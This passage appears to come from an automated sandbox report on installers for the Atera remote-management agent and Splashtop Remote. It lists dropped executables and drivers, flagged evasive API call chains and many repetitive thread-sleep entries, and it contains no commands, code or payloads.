                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\legacy.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\devcon.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC961.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\64bits\stgamepad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomCtrl32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDCAB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDetect.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRVirtualDisplay.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\driver\mv2.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\stprintmon.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\driver\mv2.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\dotnet.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win7\64bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE0C6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB5CE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\enum.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsbVhciCtrl64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebClient.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeEvasive API call chain: GetLocalTime,DecisionNodes
                                Source: C:\Windows\Temp\SplashtopStreamer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                                Source: C:\Windows\Temp\SplashtopStreamer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 3868Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1456Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6036Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6412Thread sleep count: 2349 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6128Thread sleep count: 7356 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4476Thread sleep time: -23058430092136925s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4476Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6036Thread sleep time: -220000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4464Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3604Thread sleep time: -180000s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 5480Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7136Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1908Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3068Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2132Thread sleep count: 8078 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2132Thread sleep count: 1444 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7108Thread sleep count: 38 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7108Thread sleep time: -35048813740048126s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2140Thread sleep time: -220000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1376Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2792Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6460Thread sleep count: 4117 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 5436Thread sleep count: 5755 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -20291418481080494s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599766s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599656s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599547s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599433s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599219s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599109s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -599000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598562s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598453s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598344s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598234s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598125s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -598016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597688s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597563s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597438s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597327s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597219s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -597094s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596766s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596656s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596547s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596437s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596219s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -596094s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -595984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -595871s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7368Thread sleep time: -595766s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep count: 44 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -40582836962160988s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7216Thread sleep count: 6283 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -599890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -599778s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7216Thread sleep count: 3519 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -599653s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -599265s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598922s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598706s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -598025s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597919s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597702s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597483s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597347s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597218s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -597109s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596987s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596745s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596422s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -596047s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595655s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595546s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595437s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595215s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -595030s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594810s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594577s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594356s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -594031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593806s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593593s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -593031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 7212Thread sleep time: -592811s >= -30000s
